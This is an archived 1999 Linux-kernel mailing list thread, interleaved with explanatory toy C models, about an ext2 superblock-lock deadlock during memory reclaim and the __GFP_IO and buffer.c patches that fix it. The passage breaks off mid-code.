	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm



On Thu, 7 Jan 1999, Linus Torvalds wrote:
> 
> The deadlock I suspect is:
>  - we're low on memory
>  - we allocate or look up a new block on the filesystem. This involves
>    getting the ext2 superblock lock, and doing a "bread()" of the free
>    block bitmap block.
>  - this causes us to try to allocate a new buffer, and we are so low on
>    memory that we go into try_to_free_pages() to find some more memory.
>  - try_to_free_pages() finds a shared memory file to page out.
>  - trying to page that out, it looks up the buffers on the filesystem it
>    needs, but deadlocks on the superblock lock.

Confirmed. Hpa was good enough to reproduce this, and my debugging code
caught the (fairly deep) deadlock: 

	system_call ->
	sys_write ->
	ext2_file_write ->
	ext2_getblk ->
	ext2_alloc_block ->	** gets superblock lock **
	ext2_new_block ->
	getblk ->
	refill_freelist ->
	grow_buffers ->
	__get_free_pages ->
	try_to_free_pages ->
	swap_out ->
	swap_out_process ->
	swap_out_vma ->
	try_to_swap_out ->
	filemap_swapout ->
	filemap_write_page ->
	ext2_file_write ->
	ext2_getblk ->
	ext2_alloc_block ->
	__wait_on_super		** BOOM - we want the superblock lock again **

and I suspect the fix is fairly simple: I'll just add back the __GFP_IO
bit (we kind of used to have one that did something similar) which will
make the swap-out code not write out shared pages when it allocates
buffers. 

The better fix would actually be to make sure that filesystems do not hold
locks around these kinds of blocking operations, but that is harder to do
at this late stage.
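
The recursion in the trace above can be modelled in user space. The sketch below is a toy, not kernel code: `toy_sb`, `toy_alloc_block`, `toy_reclaim` and `TOY_GFP_IO` are hypothetical names, and the "lock" is a plain flag so that a would-be deadlock is reported instead of hanging.

```c
#include <stdbool.h>

#define TOY_GFP_IO 0x10   /* hypothetical: "reclaim may start filesystem I/O" */

struct toy_sb {
	bool locked;          /* stands in for the ext2 superblock lock */
};

enum toy_result { TOY_OK, TOY_SKIPPED_IO, TOY_DEADLOCK };

/* Writing a dirty shared page needs the superblock lock (block allocation). */
enum toy_result toy_write_shared_page(struct toy_sb *sb)
{
	if (sb->locked)
		return TOY_DEADLOCK;   /* a real kernel would sleep forever here */
	sb->locked = true;
	/* ... allocate the block and write the page ... */
	sb->locked = false;
	return TOY_OK;
}

/* Reclaim path: only touch dirty shared pages if the caller allows I/O. */
enum toy_result toy_reclaim(struct toy_sb *sb, unsigned int gfp_mask)
{
	if (!(gfp_mask & TOY_GFP_IO))
		return TOY_SKIPPED_IO;
	return toy_write_shared_page(sb);
}

/* Filesystem path: takes the lock, then needs memory for a buffer. */
enum toy_result toy_alloc_block(struct toy_sb *sb, unsigned int gfp_mask)
{
	enum toy_result r;

	sb->locked = true;                 /* the block allocator takes the lock */
	r = toy_reclaim(sb, gfp_mask);     /* low on memory: reclaim runs */
	sb->locked = false;
	return r;
}
```

Calling `toy_alloc_block()` with `TOY_GFP_IO` set reports the deadlock; calling it with the bit clear makes reclaim back off, which is the behaviour the proposed fix aims for.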

		Linus

^ permalink raw reply	[relevance 62%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 18:19 55%                                       ` Linus Torvalds
@ 1999-01-07 20:35 64%                                         ` Andrea Arcangeli
  1999-01-07 23:51 64%                                           ` Linus Torvalds
  0 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-07 20:35 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann, bredelin, linux-kernel, linux-mm

On Thu, 7 Jan 1999, Linus Torvalds wrote:

> 
> 
> On Thu, 7 Jan 1999, Andrea Arcangeli wrote:
> > 
> > This first patch allows swap_out to use a more fine-grained weight. It should
> > help at least in low-memory environments.
> 
> The basic reason I didn't want to do this was that I thought it was wrong
> to try to base _any_ decision on any virtual memory sizes. The reason is
> simply that I think RSS isn't a very interesting thing to look at.

But now I am not looking at RSS; I am looking only at total_vm. The point
of the patch is only to stay _balanced_ between passes even if the system
has some processes with a total_vm of 1 GB and some processes with
a total_vm of 1 kB. Under normal conditions the patch _should_ make no
difference... In my theory at least ;)

^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 20:35 64%                                         ` Andrea Arcangeli
@ 1999-01-07 23:51 64%                                           ` Linus Torvalds
  1999-01-08  0:04 64%                                             ` Andrea Arcangeli
  0 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1999-01-07 23:51 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann, bredelin, linux-kernel, linux-mm



On Thu, 7 Jan 1999, Andrea Arcangeli wrote:
> > The basic reason I didn't want to do this was that I thought it was wrong
> > to try to base _any_ decision on any virtual memory sizes. The reason is
> > simply that I think RSS isn't a very interesting thing to look at.
> 
> But now I am not looking at RSS; I am looking only at total_vm. The point
> of the patch is only to stay _balanced_ between passes even if the system
> has some processes with a total_vm of 1 GB and some processes with
> a total_vm of 1 kB. Under normal conditions the patch _should_ make no
> difference... In my theory at least ;)

Ehh, and how do you protect against somebody playing games with your mind
by doing _huge_ mappings of something that takes no real memory? The VM
footprint of a process is not necessarily related to how much physical
memory you use. 
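
The objection can be made concrete with a toy comparison. This is only an illustration with made-up numbers: `toy_proc` and both helper functions are hypothetical and do not correspond to the patch under discussion.

```c
#include <stddef.h>

struct toy_proc {
	unsigned long total_vm;   /* pages of address space mapped */
	unsigned long rss;        /* pages actually resident in RAM */
};

/* Index of the process with the largest total_vm (n must be > 0). */
size_t toy_largest_total_vm(const struct toy_proc *p, size_t n)
{
	size_t i, best = 0;

	for (i = 1; i < n; i++)
		if (p[i].total_vm > p[best].total_vm)
			best = i;
	return best;
}

/* Index of the process with the largest rss (n must be > 0). */
size_t toy_largest_rss(const struct toy_proc *p, size_t n)
{
	size_t i, best = 0;

	for (i = 1; i < n; i++)
		if (p[i].rss > p[best].rss)
			best = i;
	return best;
}
```

With one process that maps 1000000 pages but keeps only 10 resident, and another that maps 5000 pages with 4000 resident, the two rankings disagree: the first looks largest by `total_vm` even though it holds almost no physical memory.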

Basically, I think the thing should either be simple or right, and yours
is somewhere in between - neither simple nor strictly correct.

Also, I've been happily deleting code, and it has worked wonderfully. This
patch adds logic and code back.

		Linus

^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 23:51 64%                                           ` Linus Torvalds
@ 1999-01-08  0:04 64%                                             ` Andrea Arcangeli
  0 siblings, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-08  0:04 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: linux-kernel, linux-mm

On Thu, 7 Jan 1999, Linus Torvalds wrote:

> Ehh, and how do you protect against somebody playing games with your mind
> by doing _huge_ mappings of something that takes no real memory? The VM
> footprint of a process is not necessarily related to how much physical
> memory you use. 

I was in fact excluding all tasks with rss == 0 from the total_vm calculation,
but yes, I am convinced that my more fine-grained counter is not needed.

Andrea Arcangeli

^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 22:57 62%                                         ` Linus Torvalds
@ 1999-01-08  1:16 60%                                           ` Linus Torvalds
  1999-01-08 10:45 50%                                             ` Andrea Arcangeli
  0 siblings, 1 reply; 200+ results
From: Linus Torvalds @ 1999-01-08  1:16 UTC (permalink / raw)
  To: Eric W. Biederman
  Cc: Andrea Arcangeli, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm



On Thu, 7 Jan 1999, Linus Torvalds wrote:
>
> and I suspect the fix is fairly simple: I'll just add back the __GFP_IO
> bit (we kind of used to have one that did something similar) which will
> make the swap-out code not write out shared pages when it allocates
> buffers. 

Ok, here it is.. Stable.

		Linus

-----
diff -u --recursive --new-file v2.2.0-pre5/linux/include/linux/mm.h linux/include/linux/mm.h
--- v2.2.0-pre5/linux/include/linux/mm.h	Thu Jan  7 15:11:40 1999
+++ linux/include/linux/mm.h	Thu Jan  7 15:04:54 1999
@@ -315,14 +323,15 @@
 #define __GFP_LOW	0x02
 #define __GFP_MED	0x04
 #define __GFP_HIGH	0x08
+#define __GFP_IO	0x10
 
 #define __GFP_DMA	0x80
 
 #define GFP_BUFFER	(__GFP_LOW | __GFP_WAIT)
 #define GFP_ATOMIC	(__GFP_HIGH)
-#define GFP_USER	(__GFP_LOW | __GFP_WAIT)
-#define GFP_KERNEL	(__GFP_MED | __GFP_WAIT)
-#define GFP_NFS		(__GFP_HIGH | __GFP_WAIT)
+#define GFP_USER	(__GFP_LOW | __GFP_WAIT | __GFP_IO)
+#define GFP_KERNEL	(__GFP_MED | __GFP_WAIT | __GFP_IO)
+#define GFP_NFS		(__GFP_HIGH | __GFP_WAIT | __GFP_IO)
 
 /* Flag - indicates that the buffer will be suitable for DMA.  Ignored on some
    platforms, used as appropriate on others */
diff -u --recursive --new-file v2.2.0-pre5/linux/mm/vmscan.c linux/mm/vmscan.c
--- v2.2.0-pre5/linux/mm/vmscan.c	Thu Jan  7 15:11:41 1999
+++ linux/mm/vmscan.c	Thu Jan  7 15:09:46 1999
@@ -76,7 +76,6 @@
 		set_pte(page_table, __pte(entry));
 drop_pte:
 		vma->vm_mm->rss--;
-		tsk->nswap++;
 		flush_tlb_page(vma, address);
 		__free_page(page_map);
 		return 0;
@@ -99,6 +98,14 @@
 		pte_clear(page_table);
 		goto drop_pte;
 	}
+
+	/*
+	 * Don't go down into the swap-out stuff if
+	 * we cannot do I/O! Avoid recursing on FS
+	 * locks etc.
+	 */
+	if (!(gfp_mask & __GFP_IO))
+		return 0;
 
 	/*
 	 * Ok, it's really dirty. That means that
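
The effect of the new bit on each allocation class can be checked with a few lines of stand-alone C. The values below are copied from the hunk above, except `TOY_GFP_WAIT`, which the hunk does not show; 0x01 is an assumption made for this sketch. All `TOY_` names and `toy_may_swap_out()` are hypothetical.

```c
/* Bit values as in the mm.h hunk; TOY_GFP_WAIT = 0x01 is an assumption. */
#define TOY_GFP_WAIT 0x01
#define TOY_GFP_LOW  0x02
#define TOY_GFP_MED  0x04
#define TOY_GFP_HIGH 0x08
#define TOY_GFP_IO   0x10

#define TOY_GFP_BUFFER (TOY_GFP_LOW | TOY_GFP_WAIT)
#define TOY_GFP_ATOMIC (TOY_GFP_HIGH)
#define TOY_GFP_USER   (TOY_GFP_LOW | TOY_GFP_WAIT | TOY_GFP_IO)
#define TOY_GFP_KERNEL (TOY_GFP_MED | TOY_GFP_WAIT | TOY_GFP_IO)
#define TOY_GFP_NFS    (TOY_GFP_HIGH | TOY_GFP_WAIT | TOY_GFP_IO)

/*
 * Mirrors the new test in the vmscan.c hunk: returns 1 if the swap-out
 * path may go on to write the page, 0 if it has to back off.
 */
int toy_may_swap_out(unsigned int gfp_mask)
{
	return (gfp_mask & TOY_GFP_IO) != 0;
}
```

Only the buffer and atomic classes lack the I/O bit, so only allocations made with those masks skip the write-out path.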


^ permalink raw reply	[relevance 60%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 17:56 48%                                       ` Linus Torvalds
                                                           ` (2 preceding siblings ...)
  1999-01-07 22:57 62%                                         ` Linus Torvalds
@ 1999-01-08  2:56 54%                                         ` Eric W. Biederman
  1999-01-09  0:50 60%                                         ` David S. Miller
  1999-01-09  2:13 51%                                         ` Stephen C. Tweedie
  5 siblings, 0 replies; 200+ results
From: Eric W. Biederman @ 1999-01-08  2:56 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Andrea Arcangeli, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm

>>>>> "LT" == Linus Torvalds <torvalds@transmeta.com> writes:

LT> On 6 Jan 1999, Eric W. Biederman wrote:
>> 
>> 1) With your comments on PG_dirty/(what shrink_mmap should do) you
>> have worked out what needs to happen for the mapped in memory case,
>> and I haven't quite gotten there.  Thank You.

LT> Note that it is not finalized. That's why I didn't write the code (which
LT> should be fairly simple), because it has some fairly subtle issues and
LT> thus becomes a 2.3.x thing, I very much suspect.

The code probably will be simple enough, but there are issues.
The complete issue for 2.3.x is dirty data in the page cache,
mapped shared pages are just a small subset.

This will be much more important for NFS, e2compr, and not
double buffering between the page cache and the buffer cache,
than for this case.


>> 2) I have tested using PG_dirty from shrink_mmap and it is a
>> performance problem because it loses all locality of reference,
>> and because it forces shrink_mmap into a dual role, of freeing and
>> writing pages, which need separate tuning.

LT> Exactly. This is part of the complexity.

LT> The right solution (I _think_) is to conceptually always mark it PG_dirty
LT> in vmscan, and basically leave all the nasty cases to the filemap physical
LT> page scan. But in the simple cases (ie a swap-cached page that is only
LT> mapped by one process and doesn't have any other users), you'd start the
LT> IO "early".

This sounds good for the subset of the problem you are considering.

From where I stand, something that allocates a streamlined buffer_head
for the dirty pages sounds even better. That, plus a periodic
scan of the page tables that clears the dirty bit in the page tables and
marks the pages dirty before we need the pages to be clean.

LT> Basically, I think that the stuff we handle now with the swap-cache we do
LT> well on already, and we'd only really want to handle the shared memory
LT> case with PG_dirty. But I think this is a 2.3 issue, and I only added the
LT> comment (and the PG_dirty define) for now. 

Thanks, it does give some encouragement and some relief. There are enough
things to shake out that I am much more comfortable with early 2.3,
where we have time to convert things to a new way of doing things.

LT> It might be something good to test out, but I really don't want patches at
LT> this date (unless your patches also fix the above deadlock problem, which
LT> I can't see them doing ;)

Then I will proceed with my previous plan and see if I can get a fairly
complete set of patches ready for 2.3.early

Eric

^ permalink raw reply	[relevance 54%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-08  1:16 60%                                           ` Linus Torvalds
@ 1999-01-08 10:45 50%                                             ` Andrea Arcangeli
  1999-01-08 19:06 64%                                               ` Linus Torvalds
  0 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-08 10:45 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Eric W. Biederman, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm

On Thu, 7 Jan 1999, Linus Torvalds wrote:

> Ok, here it is.. Stable.

Yesterday, after your email, I tried and was able to reproduce the
deadlock here too. It's trivial: simply allocate a shared mapping of 160 MB,
then dirty it and msync it in a loop. So I applied your patch, and
the machine still deadlocked after a few seconds. I thought "argg,
update_shared_mappings is faulting, noooooo"!! So I removed
update_shared_mappings() and tried again, and it still deadlocked... I
thought "oh, cool, I still have something to fix ;)".

So I developed this debugging code (which I post here because I guess it
could be useful to many others too) to find out which bug was still
pending:

Index: sched.c
===================================================================
RCS file: /var/cvs/linux/kernel/sched.c,v
retrieving revision 1.1.1.1.2.37
diff -u -r1.1.1.1.2.37 sched.c
--- sched.c	1999/01/07 11:57:23	1.1.1.1.2.37
+++ sched.c	1999/01/08 10:41:53
@@ -22,6 +22,10 @@
  * current-task
  */
 
+/*
+ * Debug down() code. Copyright (C) 1999  Andrea Arcangeli
+ */
+
 #include <linux/mm.h>
 #include <linux/kernel_stat.h>
 #include <linux/fdreg.h>
@@ -893,12 +897,27 @@
 	tsk->state = TASK_RUNNING;		\
 	remove_wait_queue(&sem->wait, &wait);
 
+void generate_oops (struct semaphore *sem)
+{
+	sema_init(sem, 9876);
+	wake_up(&sem->wait);
+}
+
 void __down(struct semaphore * sem)
 {
 	DOWN_VAR
+	struct timer_list timer;
+	init_timer (&timer);
+	timer.expires = jiffies + HZ*20;
+	timer.data = (unsigned long) sem;
+	timer.function = (void (*)(unsigned long)) generate_oops;
+	add_timer(&timer);
 	DOWN_HEAD(TASK_UNINTERRUPTIBLE)
 	schedule();
+	if (atomic_read(&sem->count) == 9876)
+		*(int *) 0 = 0;
 	DOWN_TAIL(TASK_UNINTERRUPTIBLE)
+	del_timer(&timer);
 }
 
 int __down_interruptible(struct semaphore * sem)
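
The idea behind the debugging patch above (arm a timer before sleeping and, if it fires, poison the semaphore so the sleeper can force an oops and a stack trace) can be shown in a deterministic user-space model. This is only a sketch: `toy_sem`, `toy_down_debug` and the tick-based "scheduler" are hypothetical stand-ins, and nothing here uses the kernel timer API.

```c
#define TOY_POISON 9876   /* same magic value the debug patch stores in the count */

struct toy_sem {
	int count;            /* > 0 means the semaphore can be taken */
};

enum toy_down { TOY_DOWN_OK, TOY_DOWN_STUCK };

/*
 * Wait for the semaphore for at most timeout_ticks simulated ticks.
 * release_at is the tick at which some other task would call up();
 * a negative value means nobody ever does.
 */
enum toy_down toy_down_debug(struct toy_sem *sem, int timeout_ticks,
			     int release_at)
{
	int tick;

	for (tick = 0; tick < timeout_ticks; tick++) {
		if (tick == release_at)
			sem->count++;          /* simulated up() from the holder */
		if (sem->count > 0) {
			sem->count--;          /* got the semaphore */
			return TOY_DOWN_OK;
		}
	}
	sem->count = TOY_POISON;           /* the watchdog fired: mark the semaphore */
	return TOY_DOWN_STUCK;             /* the patch forces an oops at this point */
}
```

A waiter that is released before the timeout returns normally; one that is never released comes back with the poisoned count, which is the condition the patch turns into a NULL dereference to obtain the trace.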


Then I recompiled, rebooted, and ran the deadlocking proggy again. It deadlocked
again after a few seconds, and 20 seconds later I had a
nice Oops on the screen. SysRq-K helped me restore some functionality
in another console. Then I ran dmesg | ksymoops... and got this:

Using `/usr/src/linux/System.map' to map addresses to symbols.

>>EIP: c0111646 <__down+b2/160>
Trace: c0111574 <generate_oops>
Trace: c0189f58 <__down_failed+8/10>
Trace: c010ef1a <do_page_fault+56/340>
Trace: c0108c0d <error_code+2d/40>
Trace: c0111646 <__down+b2/160>
Trace: c0111574 <generate_oops>
Trace: c0189f58 <__down_failed+8/10>
Trace: c011dc59 <filemap_write_page+9d/138>
Trace: c011dd59 <filemap_swapout+65/7c>
Trace: c0121864 <try_to_swap_out+118/1c4>
Trace: c0121a18 <swap_out_vma+108/164>
Trace: c0121ad4 <swap_out_process+60/88>
Trace: c0121bdb <swap_out+df/fc>
Trace: c011cbb7 <shrink_mmap+11b/138>
Trace: c0121d1a <free_user_and_cache+1e/34>
Trace: c0121d76 <try_to_free_pages+46/a4>
Trace: c0122615 <__get_free_pages+d5/220>
Trace: c0126af2 <get_hash_table+52/64>
Trace: c0127bcf <grow_buffers+3b/ec>
Trace: c0126ca8 <refill_freelist+c/34>
Trace: c0126f3a <getblk+202/228>
Trace: c013af6c <ext2_alloc_block+68/13c>
Trace: c013b5c4 <block_getblk+15c/2b0>
Trace: c013b887 <ext2_getblk+16f/20c>
Trace: c0139d2b <ext2_file_write+40b/554>
Trace: c011dcc0 <filemap_write_page+104/138>
Trace: c011e0fe <filemap_sync+256/30c>
Trace: c011e297 <msync_interval+2f/7c>
Trace: c011e3d2 <sys_msync+ee/14c>
Trace: c0108ad4 <system_call+34/40>
Code: c0111646 <__down+b2/160> 
Code: c0111646 <__down+b2/160>  c7 05 00 00 00 	movl   $0x0,0x0
Code: c011164b <__down+b7/160>  00 00 00 00 00 
Code: c0111656 <__down+c2/160>  8b 75 d8       	movl   0xffffffd8(%ebp),%esi
Code: c0111659 <__down+c5/160>  c7 06 02 00 00 	movl   $0x2,(%esi)
Code: c011165f <__down+cb/160>  31 00          	xorl   %eax,(%eax)
Code: c0111667 <__down+d3/160>  90             	nop    
Code: c0111668 <__down+d4/160>  90             	nop    
Code: c0111669 <__down+d5/160>  90             	nop    

So I looked at buffer.c ;)

Index: buffer.c
===================================================================
RCS file: /var/cvs/linux/fs/buffer.c,v
retrieving revision 1.1.1.1.2.8
diff -u -r1.1.1.1.2.8 buffer.c
--- buffer.c	1999/01/07 11:57:21	1.1.1.1.2.8
+++ linux/fs/buffer.c	1999/01/08 10:27:09
@@ -689,7 +689,7 @@
  */
 static void refill_freelist(int size)
 {
-	if (!grow_buffers(GFP_KERNEL, size)) {
+	if (!grow_buffers(GFP_BUFFER, size)) {
 		wakeup_bdflush(1);
 		current->policy |= SCHED_YIELD;
 		schedule();


and now it is really stable ;))

^ permalink raw reply	[relevance 50%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-08 10:45 50%                                             ` Andrea Arcangeli
@ 1999-01-08 19:06 64%                                               ` Linus Torvalds
  0 siblings, 0 replies; 200+ results
From: Linus Torvalds @ 1999-01-08 19:06 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: Eric W. Biederman, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm



On Fri, 8 Jan 1999, Andrea Arcangeli wrote:
> 
> So I looked at buffer.c ;)

Ehh, duh. I had it right in my tree, but the _patch_ I sent out only had
my mm changes, but not my fs changes. 

Embarrassing ;)

		Linus

^ permalink raw reply	[relevance 64%]

* Re: a bug report
  1999-01-07 15:53 64% a bug report radium
@ 1999-01-08 23:47 64% ` Anton Blanchard
  0 siblings, 0 replies; 200+ results
From: Anton Blanchard @ 1999-01-08 23:47 UTC (permalink / raw)
  To: ultralinux


> I have a Sun SPARCstation 2 with 64 MB of RAM and a Seagate 4.5hd. When I quit the X Window interface, the whole system crashes. I tried recompiling the kernel, but that doesn't fix the bug.

Which version of the kernel are you using? The cgsix problem should be
fixed for recent (~2.1.130) kernels.

Anton

^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 17:56 48%                                       ` Linus Torvalds
                                                           ` (3 preceding siblings ...)
  1999-01-08  2:56 54%                                         ` Eric W. Biederman
@ 1999-01-09  0:50 60%                                         ` David S. Miller
  1999-01-09  2:13 51%                                         ` Stephen C. Tweedie
  5 siblings, 0 replies; 200+ results
From: David S. Miller @ 1999-01-09  0:50 UTC (permalink / raw)
  To: torvalds
  Cc: ebiederm+eric, andrea, steve, damonbrent, reese, kalle.andersson,
	Zlatko.Calusic, bmccann, alan, bredelin, sct, linux-kernel,
	H.H.vanRiel, linux-mm

   Date: 	Thu, 7 Jan 1999 09:56:03 -0800 (PST)
   From: Linus Torvalds <torvalds@transmeta.com>

   The positive news is that if I'm right in my suspicions it can only
   happen with shared writable mappings or shared memory segments. The
   bad news is that the bug appears rather old, and no immediate
   solution presents itself.

We could drop the superblock lock right before the actual bread()
call, grab it again right afterwards, then indicate back down to the
original caller that he should restart his search from the beginning
of the toplevel logic in ext2_free_blocks/ext2_new_block.

The second time around a bread() won't happen.

From a performance standpoint, since we are doing a disk I/O anyway,
the extra software overhead here will be moot.

However, I am concerned about deadlocks in this scheme where the
bread() kicks some other bitmap block back out to disk, and we loop
forever pingponging block bitmap blocks back and forth with no forward
progress being made.  Also the logic in these functions is non-trivial
and making an "obviously correct" patch, ignoring the possible
deadlock mentioned here, might not be easy.
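
The drop-the-lock-and-restart scheme described above can be sketched as a small user-space model. Everything here is hypothetical (`toy_fs`, `toy_bread`, `toy_load_bitmap`, `toy_new_block`); the "lock" is a flag and the "read" only records whether the lock was held when it was issued.

```c
#include <stdbool.h>

struct toy_fs {
	bool sb_locked;        /* stands in for the superblock lock */
	bool bitmap_cached;    /* is the block bitmap already in memory? */
	int  reads_unlocked;   /* reads issued without the lock held */
	int  reads_locked;     /* reads issued with the lock held (the bug) */
};

/* Simulated blocking read: just records whether the lock was held. */
void toy_bread(struct toy_fs *fs)
{
	if (fs->sb_locked)
		fs->reads_locked++;
	else
		fs->reads_unlocked++;
	fs->bitmap_cached = true;
}

/* Returns true if the caller must restart because the lock was dropped. */
bool toy_load_bitmap(struct toy_fs *fs)
{
	if (fs->bitmap_cached)
		return false;
	fs->sb_locked = false;     /* drop the lock around the blocking read */
	toy_bread(fs);
	fs->sb_locked = true;      /* take it again */
	return true;               /* state may have changed: start over */
}

/* Returns the number of restarts needed to allocate one block. */
int toy_new_block(struct toy_fs *fs)
{
	int restarts = 0;

	fs->sb_locked = true;
	while (toy_load_bitmap(fs))
		restarts++;            /* redo the search from the top */
	/* ... search the bitmap and claim a block under the lock ... */
	fs->sb_locked = false;
	return restarts;
}
```

In this model the first allocation restarts once and the second time around no read happens. The `while` loop has no bound, which is where the ping-pong concern raised above would show up if bitmap blocks kept being evicted.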

We've had a couple strange issues like this, with recursive superblock
lock problems, recall the quota writeback deadlock Bill Hawes fixed a
few months ago, very similar.

Later,
David S. Miller
davem@dm.cobaltmicro.com

^ permalink raw reply	[relevance 60%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07 17:56 48%                                       ` Linus Torvalds
                                                           ` (4 preceding siblings ...)
  1999-01-09  0:50 60%                                         ` David S. Miller
@ 1999-01-09  2:13 51%                                         ` Stephen C. Tweedie
  1999-01-09  2:34 64%                                           ` Andrea Arcangeli
  1999-01-09 12:11 64%                                           ` Andrea Arcangeli
  5 siblings, 2 replies; 200+ results
From: Stephen C. Tweedie @ 1999-01-09  2:13 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Eric W. Biederman, Andrea Arcangeli, steve, brent verner,
	Garst R. Reese, Kalle Andersson, Zlatko Calusic, Ben McCann,
	Alan Cox, bredelin, Stephen C. Tweedie, linux-kernel,
	Rik van Riel, linux-mm

Hi,

On Thu, 7 Jan 1999 09:56:03 -0800 (PST), Linus Torvalds
<torvalds@transmeta.com> said:

> That way I can be reasonably hopeful that there are no new bugs introduced
> even though performance is very different. I _do_ have some early data
> that seems to say that this _has_ uncovered a very old deadlock condition: 
> something that could happen before but was almost impossible to trigger. 

> The deadlock I suspect is:
>  - we're low on memory
>  - we allocate or look up a new block on the filesystem. This involves
>    getting the ext2 superblock lock, and doing a "bread()" of the free
>    block bitmap block.
>  - this causes us to try to allocate a new buffer, and we are so low on
>    memory that we go into try_to_free_pages() to find some more memory.
>  - try_to_free_pages() finds a shared memory file to page out.
>  - trying to page that out, it looks up the buffers on the filesystem it
>    needs, but deadlocks on the superblock lock.

Hmm, I think that's a new one to me, but add to that one which I think
we've come across before and which I have not even thought about for a
couple of years at least: a large write() to a mmap()ed file can
deadlock for a similar reason, but on the inode write lock instead of
the superblock lock.

> The positive news is that if I'm right in my suspicions it can only happen
> with shared writable mappings or shared memory segments. The bad news is
> that the bug appears rather old, and no immediate solution presents
> itself. 

A couple of solutions come to mind: (1) make the superblock lock
recursive (ugh, horrible, and it only works if we have an additional
mechanism to pin down bitmap buffers in the bitmap cache), or (2) allow
load_block_bitmap and friends to drop the superblock lock if they find
that they need to do an IO, and retry if that happened.  However, what
we're basically saying here is that all operations on the superblock_lock
have to drop the lock if they want to allocate memory, and that's not a
great deal of fun: we might as well use the kernel spinlock.

It gets worse, because of course we cannot even rely on kswapd to
function correctly in this situation --- it will block on the superblock
lock just as happily as the current process's try_to_free_pages call
will.

I think the cleanest solution may be to reimplement some form of the old
GFP_IO flag, to prevent us from trying to use IO inside
try_to_free_pages() if we know we already have a lock which could
deadlock.  The easiest way I can see of achieving something like this is
to set current->flags |= PF_MEMALLOC while we hold the superblock lock,
or create another PF_NOIO flag which prevents try_to_free_pages from
doing anything with dirty pages.  I suspect that the PF_MEMALLOC option
might be good enough for starters; it will only do the wrong thing if we
have entirely exhausted the free page list.
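
To make the PF_NOIO idea concrete, here is a minimal userspace sketch, not
kernel code.  Everything in it is an assumption made for illustration: the
flag value, the toy struct task and struct page, and the function name
try_to_free_pages_model().  It only shows the intended behaviour: while the
flag is set, reclaim may still drop clean pages but never starts a
write-out.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical per-task flag, modelled on the PF_NOIO idea above. */
#define PF_NOIO 0x1u

struct task { unsigned int flags; };
struct page { int in_use; int dirty; };

/*
 * Toy reclaim pass: free up to `want` pages from pages[0..n).
 * Clean pages can always be dropped.  Dirty pages need a write-out
 * first, which is skipped entirely while the task has PF_NOIO set.
 * Returns the number of pages freed.
 */
static int try_to_free_pages_model(const struct task *tsk,
                                   struct page *pages, size_t n, int want)
{
    int freed = 0;

    for (size_t i = 0; i < n && freed < want; i++) {
        if (!pages[i].in_use)
            continue;
        if (pages[i].dirty) {
            if (tsk->flags & PF_NOIO)
                continue;           /* would need IO: not allowed now */
            pages[i].dirty = 0;     /* stands in for the write-out */
        }
        pages[i].in_use = 0;
        freed++;
    }
    return freed;
}
```

A lock holder would set the flag before allocating and clear it afterwards;
with two clean and two dirty pages in use, the model frees only the two
clean ones while the flag is set.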

The inode deadlock at least is relatively easy to fix, either by making
the inodelock recursive, or by having a separate sharable truncate lock
to prevent pages from being invalidated in the middle of the pageout
(which was the reason for the down() in the filemap write-page code in
the first place).  The truncate lock (or allocation/deallocation lock,
if you want to do it that way) makes a ton of sense; it avoids
serialising all writes while still making sure that truncates themselves
are exclusively locked.
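
The sharable truncate lock can be pictured with a small single-threaded
model.  This is only a sketch under assumptions: the struct and function
names are hypothetical, and the try_* calls report "would have to wait"
instead of sleeping.  The point it illustrates is that write and page-out
paths can nest inside each other (both shared), while truncate excludes
them all.

```c
#include <assert.h>

/*
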